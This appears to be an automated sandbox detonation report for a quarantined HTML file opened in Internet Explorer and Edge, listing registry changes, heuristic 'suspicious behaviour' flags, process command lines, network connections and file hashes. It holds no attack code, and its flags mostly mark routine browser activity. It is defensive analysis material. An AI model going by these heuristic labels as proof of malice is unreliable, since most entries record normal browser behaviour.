| Set value (data) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008f2ad785859e0c48bc39fdee908bd4c9000000000200000000001066000000010000200000001d44a3f539daa145f949b2ee37533a937782fac1faf7553858148bc5e4a6df09000000000e8000000002000020000000804bfee843d5b8d18bb0706e4bb2a24b344fbe01016150cb5403f555e73ceae490000000151af37b2a69fcc4619bb14e5fe7930556095b9b21b60c14285eb8cca16a1294904eb60d68dfb70f65d64ad965840af35c135f98364cb229906d31658bdb5f93990b607ace3d45f88fc6be59970fd1717d8f2e68167c2e33016faf0e82ff08bfa07c89baea6649d2901e3cdbd642103d653b98505102016a9f50af3c39f17354aaed33efb478f5abfb4c2f5ed83e5b37400000008ee9190f3088d7b5a1964e254f5459f9437746493bdcb2390bc1a7f147fca171b64c3150f5c6500a87b5f80e6ce55d5be6c810f54ec00767323e1db841e57685 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d013091ba688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2508 wrote to memory of 1416 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2508 wrote to memory of 1416 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2508 wrote to memory of 1416 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2508 wrote to memory of 1416 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2508 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabBC6E.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarBD12.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d29a70f13cbc98c2fbc5265faa6d8452 |
| SHA1 | 675f7be44bed52e978536ff40ae4dba79d461579 |
| SHA256 | 6b7283e00986c2245c84db9f37a5fc07bc8ec153e92623d3d22bf384981faefe |
| SHA512 | acf0f97f06d5768d06c27aacd10f065e89b98e03619afe329f222e2cc93e9403c4fa868dcf99fe3942ac2599fc1cc6a4de2da9e04031828e7186790bd087dc90 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 008fb14948d895fe06161b41f3dd40dc |
| SHA1 | 236e9088245f966d1d3b8d61d1ef8a53f40c2ede |
| SHA256 | 07fe9ebfce837d96db6315c684395d686e017037d68148757475bd2dc8841da2 |
| SHA512 | 3d6a9ab9d0b5acaee193b7afe25fe4603da1d95d2e9a7c9ff543d6021e9d6aee03ce387bc3b3e9c113fe6d9527dafe11aaeb3f4fdff124a3fb504aab2e3dc75e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1de47cfd09be9baa5255339c943651eb |
| SHA1 | f62b3ca5dcd0516e052f557a3a87244ca4a39126 |
| SHA256 | 8a027b7d7596d97b2ebc42bf11d26189c0db3b6ad60b57ff890084952ada2152 |
| SHA512 | a5a5f7a4855a09e503fedccf42df2ad376317f19774863f20970da677a0f1d06aca5cd22e98ef076e6aad60923387275ab34cce3ecdfb7cdd62608710b17ba3d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c7f6239fa10aff3cb4690759b0c79811 |
| SHA1 | a3116847b44fd00b0d6bd1dfe993622134665a90 |
| SHA256 | 1d3ec3df0de9bf8305ff473f8afd7b8c744ea95d77ebc52d8b56bbf6e866d4af |
| SHA512 | 494957a7246973cce25e36d2c24da337bd4d1025a8d054ae615d1457c5f1aef1409f8f7ba54f76fb6fa7db9943bde196a70d8b8d114b1f6b0194868c2beeeed9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | cfbe20caf872b679aa4560331777f66e |
| SHA1 | d0830b7ee39cacdc6ccef849f02b1a07f9d6ddad |
| SHA256 | 2b7ee6b48f8b092f734f9a1db2d0606e7637683cc705a66140d8264e775781f3 |
| SHA512 | 5f63c33ba37507e58554f8d132b65296a73ca3a1135f16a4d811b1d0c286b9f113c7a2447f51e329a56381b01cb5317a12c8ba7f819e0fa5de949a90ae530ec5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4d7c66ce8288f7018d32ceb11aef4aeb |
| SHA1 | 06af6298ae718a162803a3b514baa967b9dff1a8 |
| SHA256 | 3ca65d048b15ff48ec5de6c4acff74645e0c6e02999cbf1177f794a3df30d140 |
| SHA512 | b31b710856650ea3a49131adf7c7bd74d0dc1c5ee72517b612e937a96701ac008a80897fa9ed9f9919216cbf1f39afe453ec6cf78d08c57ba0ae21ac2c47327d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3663fe71a47523fc22a053ed29fb060c |
| SHA1 | fb63729809acfae3c3694b84c11b5fdbd5306913 |
| SHA256 | c4e1129a1b00ba265694ed9537f5ed0819adddc0d799aaeec9bbad88f66a4c8e |
| SHA512 | 24ff8ef001601ae26c55e490e0086502ac6c5a9d5c4bdb52a73a2629e7f62a4cbef04e2c408d094a3b916e8c17f421b51790f589b81ae0defca9f4d7d7cbaa24 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | dad1c35eef418e53f8ed391d03774357 |
| SHA1 | 2e84dd9f330173ac298dc10f270be2738f51f93c |
| SHA256 | 93f38530b5dbf78068b57034962ecbd11e2b42f27304353d804517ed064b0fe3 |
| SHA512 | e9221803f6cbd2315f74b6c63e85e0d7721d7e3cc27744e692c2f155abb4cee660d7a6a456ab9717fcf9db16969b34a3484bd7ba91ebeec2e1af8fa0f921a9df |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c183dce1eec15e6cfe796b6e21b25d9a |
| SHA1 | 7d6715713a45e89a02b3f5cbaaa18e26f10bb9dd |
| SHA256 | 32e9951fa18f911b2ad8d36969e8e344c97717c99eb2a348da7a143bd991d8de |
| SHA512 | defc18c67cc2c4446c45697526619d245dc9959ddca2abbc86ca9fbe6770e359b9b8b3c648e64ed008bf48d3def93c464f922281648286414dde6c00932a8af7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6678198d3465a7bc78922226d64a9abc |
| SHA1 | 9da83be60ed28f534c6ab51157e535d7eb2f01c0 |
| SHA256 | 3b8acd6fa66ff22a7e5b11fb35023c9ccf143e712ef76363625eb17bcb5a0c9e |
| SHA512 | c795b5ae15df88d99c097f725249823344b41b94d19b5796b16fca8809e03e7d02cab246bdb90d8fe6805e4bab78f3e81ad484f4f804edd21ecd69f13f99efb5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 844771f82e017e357a7f57a95a4436c3 |
| SHA1 | 3143709c91ab3c580b47e29f7008daaad07a120c |
| SHA256 | b1722b6a31dd41392a55233adeb8715a37faa7cb1087d438aa29d18836a22023 |
| SHA512 | 76f5d716855b6689b7134a03254e51e45bdb89e7f4d3d4c7feb3a9a831511dfe94faa95540dc36dbbad7a0fac3803683c08615bcb4439b8065d62014f2c621e5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c1d0471abc34cd8ec67d8819c9d5e98 |
| SHA1 | b26a6cdaa967d043f85a69f06974c9f7ed4da71a |
| SHA256 | d4225411f14175930cad72048e14b38a87984a6ba6f06db52bbaf2b1bb4a1362 |
| SHA512 | d8c2d765c9eb4bd98e3cfed3d3e49e4be4ab753e04efbf2514928ef9f750387aeef19c8913dd55221e1539612e8a0580909331088bb8d8ba3da8ff3b0282e591 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 851c490ac86d2782d929ef8be2907407 |
| SHA1 | 53de2951d97b673733edcdd6110fee61c7bb4162 |
| SHA256 | 49c5bdd64f79eb3881d16d70c78c56024046205ee8b9881fe1944c77b39f0ba2 |
| SHA512 | dfd9abc5fbffd1d63fc932673b74b7bc69c3e28d5cc587fa9a72560023fd2db558c9aa928158fd3ed0527a48e28c95766b2f3038fa5bf3ec799fdcbf09a6c0e5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 80421b23939e2bf9dd5a78f6dc08fc4f |
| SHA1 | 739488a553fe9c3c7fc6915625dcab5746f31762 |
| SHA256 | 0ad318f3fb209c7aaeb5c3d7fc8c6944353f9eab78a5fc5c2f9415ce320ea4ec |
| SHA512 | 4bd192a72756815edec030a3d6759d0e3619f3bbe2d881f1d41ca848e61d03e732758ffa84251b8f30c2c67c713b535169a0938fe18915727b960d16f7c0b453 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8e5540eda9b6908bc97f4b7c6a89904a |
| SHA1 | 97760dadf1151584873fcef670ebabdac0e2ff35 |
| SHA256 | 4e5717e0b7d19ef6c2da10d28302178cfaa4e37aa70f662430be8e69a30e6368 |
| SHA512 | 7d9c07f073837bdd9a12b4f5815043f5b4d46b407301edc53df80073d7033a1bd72c42530576315b196b67de92c0dc5de0f8b2085e7b607de36664b04c02a629 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 59a6bab55f00f57d1a9125ab1ce342e7 |
| SHA1 | c1a9177ca9f272d89d264381600b3bb3048fbecd |
| SHA256 | 536a8ca805679545689b8934ae10f0c1c28eac9a4246ce9d8fb46bd5d57ad2f3 |
| SHA512 | 681b1e35651d87bbf03011a7c3729186f9e1858f92719e0375d9db21e768be3fc9f10b0de1069be0451fc0b2cae100f42880f68326eec495728714956bbdc83e |
Analysis: behavioral21
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
150s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa405a46f8,0x7ffa405a4708,0x7ffa405a4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5292 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 9f4a0b24e1ad3a25fc9435eb63195e60 |
| SHA1 | 052b5a37605d7e0e27d8b47bf162a000850196cd |
| SHA256 | 7d70a8fc286520712421636b563e9ee32335bca9a5be764544a084c77ddd5feb |
| SHA512 | 70897560b30f7885745fede85def923fb9a4f63820e351247d5dcbe81daab9dab49c1db03b29c390f58b3907d5025737a84fff026af2372c3233bc585dcfd284 |
\??\pipe\LOCAL\crashpad_1864_BHZSMGQVNFLXIUPY
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4c9b7e612ef21ee665c70534d72524b0 |
| SHA1 | e76e22880ffa7d643933bf09544ceb23573d5add |
| SHA256 | a64366387921aba157bba7472244791d5368aef8ecaf6472b616e1e130d7d05e |
| SHA512 | e195e1ce5e7c06d193aa1f924d0079ea72b66eb22c3aea5b6811172251768f649368734e817996d9f0f72ddfd0e2bf2454aaee0bc650eaffd56fa125a334ae88 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7090de84491c5e1e8ec0d01346375245 |
| SHA1 | 01985b812cd94660ead8147ab488bf165996c35c |
| SHA256 | 11c470bb14e6809cae3100ab36b25f5157016cba0e4de184dc40788f6e0f1117 |
| SHA512 | 07a7484a32609db74c59c22c706b4f5f68de98b662a78cb2f7c95cd04ab162ad3ba1fd3da63c1a2697f9d0bb75b8a7aaa2b93da7f0dc7658eda90698d2bcea3f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | abeab67aa0422831e5be2c4cc6babc67 |
| SHA1 | 7b2d7a83d472a24248a15bf846a9abf434e4d0fd |
| SHA256 | b7c0db367f35758b7083f790eea2c43d7a9b895b195ab3d68fc16c9d350152fa |
| SHA512 | fc30f21a3a920bba27ae141d5d595e8829aa70202b333787d3d6bfb3ba26852688c11ce201eac9afb2db3d977a689a6e1d50311a4897177cb75a1808612a6c22 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ad300fb8424786dd9032c73a7f0e261e |
| SHA1 | b761618d04225610947344db4a5b8226bb90ec00 |
| SHA256 | aeebe5f7bf4bca51199ef02ed02984155a16e361ee5100430065bcb224ea8969 |
